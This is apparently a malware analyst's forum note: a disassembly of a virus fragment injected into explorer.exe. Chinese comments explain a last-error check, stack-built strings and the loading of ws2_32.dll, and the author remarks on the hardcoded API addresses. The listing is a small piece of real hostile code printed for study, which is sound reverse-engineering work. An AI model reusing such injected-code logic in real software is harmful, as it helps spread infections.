010865A8 55 push ebp
010865A9 8BEC mov ebp, esp
010865AB 83C4 DC add esp, -24
010865AE 8D75 EC lea esi, dword ptr [ebp-14]
010865B1 56 push esi
010865B2 C706 437E6421 mov dword ptr [esi], 21647E43
010865B8 C746 04 332A7632 mov dword ptr [esi+4], 32762A33
010865BF C746 08 6D243231 mov dword ptr [esi+8], 3132246D
010865C6 C746 0C 63644466 mov dword ptr [esi+C], 66446463
010865CD C746 10 00000000 mov dword ptr [esi+10], 0 ;初始化
010865D4 6A 00 push 0
010865D6 6A 00 push 0 ;参数
010865D8 E8 B8F9FFFF call 01085F95 ;某api函数
010865DD 64:A1 18000000 mov eax, dword ptr fs:[18] ;teb
010865E3 8B40 34 mov eax, dword ptr [eax+34] ;lasterror
010865E6 0BC0 or eax, eax
010865E8 74 04 je short 010865EE ;为0退出到explorer.01011B47
010865EA 33C0 xor eax, eax
010865EC C9 leave
010865ED C3 retn
010865EE 8D7D DC lea edi, dword ptr [ebp-24]
010865F1 57 push edi
010865F2 C707 7773325F mov dword ptr [edi], 5F327377
010865F8 C747 04 33322E64 mov dword ptr [edi+4], 642E3233
010865FF C747 08 6C6C0012 mov dword ptr [edi+8], 12006C6C ;初始化
01086606 E8 76F9FFFF call 01085F81 ;loadlibrary
0108660B 0BC0 or eax, eax
0108660D 74 05 je short 01086614
0108660F E8 70FFFFFF call 01086584
01086614 33C0 xor eax, eax
01086616 C9 leave ;退出到explorer.01011B47
这个病毒有点...... 调用的api居然是硬编码进去的,我这里地址都不对,所以那些api不知道是什么函数